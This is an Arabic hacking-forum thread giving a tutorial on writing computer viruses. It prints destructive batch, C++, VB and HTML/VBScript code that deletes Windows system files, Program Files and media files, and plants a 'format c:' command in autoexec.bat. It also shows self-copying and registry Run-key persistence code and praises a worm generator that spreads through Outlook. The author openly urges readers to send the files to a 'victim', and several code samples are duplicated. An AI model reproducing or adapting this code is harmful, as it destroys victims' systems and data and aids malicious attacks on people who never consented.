2 مشترك

شرح لأقوى طرق تصميم فيروس

عبد الرحمان: المساهمات : 1
تاريخ التسجيل : 17/07/2015

مساهمة رقم 1

رد: شرح لأقوى طرق تصميم فيروس

عبد الرحمان الجمعة يوليو 17, 2015 4:24 pm

السلام عليكم شكرا على الموضوع الرائع خاصتا الفيروسات من نوع bat لانها غير مكشوفة للانتي فيروس ويمكن تحميلها وارسالها للضحية عبر الفيس بوك عكس غيرها من الفيروسات .
سؤال :هل هناك كود من نوع bat يمكنه اسال ip الضحية الي عند ضغط الضحية عليه؟

عاشق الهكر

عاشق الهكر: المساهمات : 24
تاريخ التسجيل : 15/01/2009

مساهمة رقم 2

رد: شرح لأقوى طرق تصميم فيروس

عاشق الهكر السبت يناير 17, 2009 9:58 am

تكملة الى الموضوع

يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :

هذا هو كل ما انا حصلت عليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من اكواد الفيروسات التى يمكننا من استخدامها و مجموعه من الأكواد التى باضافتها للفيروس تعطى له خصائص مفيده و هذا ليس كل شئ فنا ان حصلت على ى كود اخر فسوف اعطيه لكم فى هذا الموضوع و سوف اشرح فيه كل ما انا استطيع لذا انتظروا منى المفيد و يتبقى لنى شئ بسيط وانهى هذا الجزء و هو مجموعة اكواد لأشهر الفيروسات

فيرووس C++ :

*****************

#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat");
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}

فيرووس Visual Basic :

*****************

SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"

فيروس Html

*****************

<html>

<head>
****** http-*****="*******-Type"
*******="text/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0">
******** ********="VBScript">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
***********
<!--- This script author is THEONE---!>
</body>
</html>

( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )

يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم

هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذا الموضوع [/b]

فيرووس C++ :

*****************

#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat");
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}

فيرووس Visual Basic :

*****************

SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"

فيروس Html

*****************

<html>

<head>
****** http-*****="*******-Type"
*******="text/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0">
******** ********="VBScript">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
***********
<!--- This script author is THEONE---!>
</body>
</html>

( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )

يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم

هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذا الموضوع

هذا هو الجزء الثانى من الفيروسات و هو اصغر الأجزاء نظرا لأنى سوف اضع فيه فكرة وليس طريقة شرح

و هو صنع فيروس بواسطة بعض البرامج الخاصة بذلك

هناك العديد من البرامج التى تؤدى ما انت تطمع قيه و بقوة ولاكن معظمها خطر جدا و يكتشفه مضاد الفيروس

ولاكن هناك برنامج وجت بعض المعلومات عنه وانا الأن اعد شرح مفصل و بالصور عنه ولاكنى اخشى من ان يتضرر منه المبتدأين و ذلك لما سوف ترونه من مميزات هذا البرنامج الخطيرة

هذا البرنامج لأنشاء فيروس من نظام worm او الدودة و هو برنامج vbswg2 الشهير و هذا البرنامج خطيييييييييييير جدااااااااااا لأنه به صمم فيروس الحب ( I love u ) و فيروس آنا كرنوكوفا العارية و من اهم مميزات التى تضاف الى الفيروس المصمم بهذا البرنامج انه يضرب outlook و يصيب الأميلات و ينتشر من خلاله وهذا عن طريق انه يضرب القائمة البريدية للأميلات التى تكون انت مضيفها لديك و يضرب كل الأميلات التى انت مضيفها و يواصل انتشاره بهذه الطريقة

و من مميزات هذا البرنامج :

2- تضع فيه ميزة الإرسال عن طريق outlook واكيد الي يقرى الكلام فوق راح يعرف

ملاحظه:

صاحب هذا البرنامج مايزال مسجون وهذا دليل على شدة وخطورة البرنامج

لكن الانتي فايرس يكتشفه بسهوله

هذه صورة للبرنامج

هذا الشرح ليس كافيا اليس كذلك اعلم ولاكنى لازلت اتعلم استخدام هذا البرنامج و احاول اتقانه حتى لا اقوم بشرح شئ خطأ وانتم كما تعرفون انه من الخطر جدا حدوث اى خطأ يمكن ان يؤدى الى كارثة

هذا هو نهاية الجزء الأول ولاكن يتبقى لنا الجزء الثالث و هو عن طريق صنع فيروس بواسطة الفجول بيسك ولاكنى لم اكمله لذا انظروه منى قريبا

احب ان اوضح لكم جميعا شئ واحد وهو انى قد وضعت لكم هذه الطروق وليست هى النهاية ولاكن يبقى لدى الكثير لأقدمه لكم فيما بعد و سوف اضعها لكم فى هذا الموضوع كرد عليه لذا عليكم بمتابعة هذا الموضوع اول باول

اما الأن كل ما استطيع قوله لكم هو انى اتمنى لكم التوفيق دائما و اتمنى ان اكون قدمت لكم الجديد
منقول لأهميته الشديدة

[/color][/size] echo off@ echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat echo format c: /q /u /autotest >nul >>c:\autoexec.bat echo off@ code:--------------------------------------------------------------------------------echo off@ On Error Resume Next Option Explicit 1- يحفظ لك الدودة بامتداد jpg - gih - txt - html والامتداد الرئيسي vbs 3- اول ماتشغل Mirc راح يقوم على نشر نفسه 4- يمكن تدمجه مع احدى الملفات 5- يحذفلك جميع الملفات وهذا على حسب متطلباتك واستخدامك لخيارات البرنامج 6- الظاهر لحد هنا كافي لتسميته فيروس او دودة ويوجد فرق كبير بينهم لكن المهم انه يدمر لك الجهاز ..... اكتشفوا المميزات الباقية بنفسكم [/color][/

عاشق الهكر

عاشق الهكر: المساهمات : 24
تاريخ التسجيل : 15/01/2009

مساهمة رقم 3

شرح لأقوى طرق تصميم فيروس

عاشق الهكر السبت يناير 17, 2009 9:55 am

[center][color=blue]شرح لأقوى طرق تصميم فيروس لن تجد مثله

بسم الله الرحمن الرحيم

هذا الموضوع من اقوى المواضيع التى تجذب القراء و الراغبين فى تعلم الهكر و تجذب اكثر محبى البرمجة الذين يسعون الى تعلم كل جديد فى مجال البرمجة

و نظرا لأنى واحد من محبى البرمجة احببت ان ابحث فى النت لتعلم طرق صناعة الفيروسات و الحمد لله وجدت الكثير من المعلومات التى افادتنى و دلتنى الى الطريق الذى انا اريده لذا اردت ان اعلم كل من يريد ذلك و كل من يرغب فى تصميم فيروس

احب ان اوضح ان الطرق سوف اشرحها هنا و هى عبارة عن 4 اجزاء و هى كل ما انا كتبته حتى الأن و سوف اضعها كلها هنا و هذا للتسهيل على كل من يجد هذا الموضوع مهم و يجذب

ارجوا اولا قبل البدأ فى هذا الموضوع ان اوضح شئ ان هذا الموضوع من نتاج تعب كبير مر على حتى انتجت مثل هذا الموضوع لذا ارجوا من كل من يريد نقل الموضوع ان يكتب انه نقله من Broken_ice و يكتب اسم المنتدى الذى نقله منه

قبل البدأ فى تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمة و هى التعريف بالفيروس و انواعه و شروطه و التى سوف اوضحها الأن

نبدأ الموضوع

و يجب توافر عدة شروط لكى يصبح الفيروس ذو فاعلية و هى

أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه

أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباط باحد الملفات

أن يكون ذا هدف و مغزى

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

الأن و بعد ان فهمنا بعض المصطلحات الأساسية و التى يجب ان نكون على دراية فلنبدأ فى التصميم

ولاكن قبل البدأ يجب ان اوضح شئ خطير جدا جدا جدا

(( اذا كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجو ان تقوم بفهم الموضوع دون اى محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اى خطا فى اى كود سوف يؤدى الى اضرار كبيرة منها تدمير نظام التشغيل لذا ارجو الحزر من تصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف تقوم بها ))

الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فى صناعة الفيروسات

لقد تعرفت اثناء بحثى عبر الأنترنت على مجموعة من الطرق لتصميم الفيروسات و هى

عن طريق الـnotepad

عن طريق برنامج الفجول بيسك (vb)

عن طريق برامج تصميم الفيروسات ( خطيرة جداااا و فيروساتها قوية – لكن اغلبها يكشفه النورتون)

و سوف اقوم الأن بعرض كل منهم على حذة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم ما سوف اقوم به

هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلم تصميم الفيروس بواسطة notepad

للعمل على تصميم فيروس بهذا النوع من التصميمات يجب ان تعرف كيف تضع الأكواد التى سوف اعطيها لك و هى عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه باى اسم تريده ولاكن بامتداد .bat

و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الكود المناسب لك فى الnotepad و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الى الضحية التى تريد انهائها او يمكنك تجربت هذا الفيروس على جهاز التجارب اذا كان لديك

قبل ان اضع لكم الأكواد اريد ان اوضح ان هذه الأكواد منقولة طبعا ولاكنى وضعت تحت كل كود اكبر شرح استطيع تقديمه عبر هذا الكود من حيث فكرة عمله و طريقة تعديله مع مثال بسيط عليه

اريد ان اوضح انه من الأفضل نسخ الكود و لصقه فى المكان الذى تريده

----------------------

نبدأ بالكود الأول :

---------------------

@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys

الـتوضـــــــــــتيح :

* بعد ان قمت بوضع الكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكل الأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان تفتحه

* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من السيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اول الكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامر التالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز

* بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!

----- لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغير هذا الكود قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذىيمكننا ان نغيره فىالكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحها او يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك منيضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاه الفيروس الى d:

مثال توضيحى :

انا الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى

@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf

ايه رايكم دلوقتى فى الفيروس الجديد اتمنى يعجبكم اما الأن فلنقراء الكود الثانى

----------------

الكود الثانى :

--------------

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

الـتوضـــــــــــتيح :

الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر

نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا اليروس هو الوحيد

بعد سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف نحن نوضحه

يعطى هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز و نلاحظ تكراره فى مسح الويندوز فى الكود

ولاكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين

echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat

اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى

اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:

سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه

ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات

اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فيكون لكود كما يلى

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat

----------------

الكود الثالث :

--------------

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه

كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat

الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده

الخاصــــــــــــــية الأولى :-

Dim copy, copy2

copy = "c:\virus.exe"

copy2 = "c:\windows\system\Project12.exe"

FileCopy copy, copy2

يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه

الخاصــــــــــــــية الثانيه :-

Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long

Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long

Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002

Private Sub Command1_Click()

Dim InputValue As String

Dim nBufferKey As Long, nBufferSubKey As Long

RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey

RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey

RegOpenKey nBufferKey, "Run-", nBufferSubKey

InputValue = "c:\windows\system\Project12.exe"

RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey

RegOpenKey nBufferKey, "Run-", nBufferSubKey

RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)

End Sub

center]

alhakar

شرح لأقوى طرق تصميم فيروس

رد: شرح لأقوى طرق تصميم فيروس

رد: شرح لأقوى طرق تصميم فيروس

شرح لأقوى طرق تصميم فيروس